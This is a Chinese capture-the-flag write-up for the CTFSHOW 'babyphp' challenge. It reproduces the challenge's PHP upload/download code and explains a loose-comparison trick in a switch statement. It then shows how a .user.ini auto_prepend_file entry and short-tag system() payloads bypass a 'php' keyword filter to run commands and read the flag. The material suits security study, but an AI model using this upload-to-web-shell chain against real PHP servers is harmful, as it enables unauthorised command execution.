编程语言
首页 > 编程语言> > CTFSHOW-日刷-[baby杯]babyphp/弱类型比较

CTFSHOW-日刷-[baby杯]babyphp/弱类型比较

作者:互联网

代码审计

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-05-31 13:40:37
# @Last Modified by:   h1xa
# @Last Modified time: 2021-05-31 16:36:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);

class fileUtil{

    private $name;
    private $content;


    public function __construct($name,$content=''){
        $this->name = $name;
        $this->content = $content;
        ini_set('open_basedir', '/var/www/html');
    }

    public function file_upload(){
        if($this->waf($this->name) && $this->waf($this->content)){
            return file_put_contents($this->name, $this->content);
        }else{
            return 0;
        }
    }

    private function waf($input){
        return !preg_match('/php/i', $input);
    }

    public function file_download(){
        if(file_exists($this->name)){
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.$this->name.'"');
            header('Content-Transfer-Encoding: binary');
            echo file_get_contents($this->name);
        }else{
            return False;
        }
    }

    public function __destruct(){

    }

}

$action = $_GET['a']?$_GET['a']:highlight_file(__FILE__);

if($action==='upload'){
    die('Permission denied');
}

switch ($action) {
    case 'upload':
        $name = $_POST['name'];
        $content = $_POST['content'];
        $ft = new fileUtil($name,$content);
        if($ft->file_upload()){
            echo $name.' upload success!';
        }
        break;
    case 'download':
        $name = $_POST['name'];
        $ft = new fileUtil($name,$content);
        if($ft->file_download()===False){
            echo $name.' download failed';
        }
        break;
    default:
        echo 'baby come on';
        break;
}

很明显的文件读取

 

 但是要想办法进入upload

 

 主要是这里既要action不为upload又要switch case为upload

这里查了一下,switch用的弱类型比较,弱类型比较字符串和bool值为true结果为true,可看下图

 而看这句话

$action = $_GET['a']?$_GET['a']:highlight_file(__FILE__);

有get传入的a,那么$action为a,否则等于highlight_file而

 

 

 

 

 因此不用传入a参数,默认就是upload(这也就是为什么开始没传参,没有显示come on)

这里还有个waf,直接<?= 即可。但是我们传入的文件名以.php不能这么改,这里可以上传.user.ini

 先传入.user.ini (name=.user.ini&content=auto_prepend_file=1.jpg)

 

 

 再传入shell (name=1.jpg&content=<?=system('ls /');?>)

 

读flag(name=1.jpg&content=<?= system('cat /flag_baby_here_you_are');?>)

 

 

 

 

标签:__,name,upload,content,action,CTFSHOW,file,baby,日刷
来源: https://www.cnblogs.com/aninock/p/15378270.html